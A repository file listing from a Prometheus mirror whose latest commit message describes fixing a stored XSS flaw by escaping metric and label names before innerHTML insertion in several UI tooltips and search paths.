upstream/prometheus
1
0
Fork 0
mirror of https://github.com/prometheus/prometheus.git synced 2026-05-04 17:04:22 -04:00
Code Issues Projects Releases Packages Wiki Activity Actions 11
prometheus/web/ui/react-app
History
Julius Volz a4d5f98f42 UI: Fix stored XSS via unescaped metric names and labels 
Metric names, label names, and label values containing HTML/JavaScript were
inserted into `innerHTML` without escaping in several UI code paths, enabling
stored XSS attacks via crafted metrics. This mostly becomes exploitable in
Prometheus 3.x, since it defaults to allowing any UTF-8 characters in metric
and label names.

Apply `escapeHTML()` to all user-controlled values before innerHTML
insertion in:

* Mantine UI chart tooltip
* Old React UI chart tooltip
* Old React UI metrics explorer fuzzy search
* Old React UI heatmap tooltip

See https://github.com/prometheus/prometheus/security/advisories/GHSA-vffh-x6r8-xx99

Signed-off-by: Julius Volz <julius.volz@gmail.com>
2026-04-04 12:19:55 +02:00
..
public fix some typos (#12498) 2023-06-29 12:28:13 +02:00
src UI: Fix stored XSS via unescaped metric names and labels 2026-04-04 12:19:55 +02:00
.env Fix broken prefixed asset links in webpack build (#9586) 2021-10-25 12:52:13 +02:00
.eslintrc.json Update React 16->17, TypeScript, and some other node deps 2021-09-14 15:46:59 +02:00
.gitignore Integrate beginning of React UI (#5694) 2019-10-17 14:38:09 +02:00
package-lock.json Migrate Mantine v7 -> v8 (#17402) 2025-11-06 09:38:27 +01:00
package.json Upgraded npm dependencies pre 3.4.0-rc.0 (#16493) 2025-04-29 17:19:23 +02:00
tsconfig.json upgrade react-app to typescript 4 2021-09-07 10:51:59 +02:00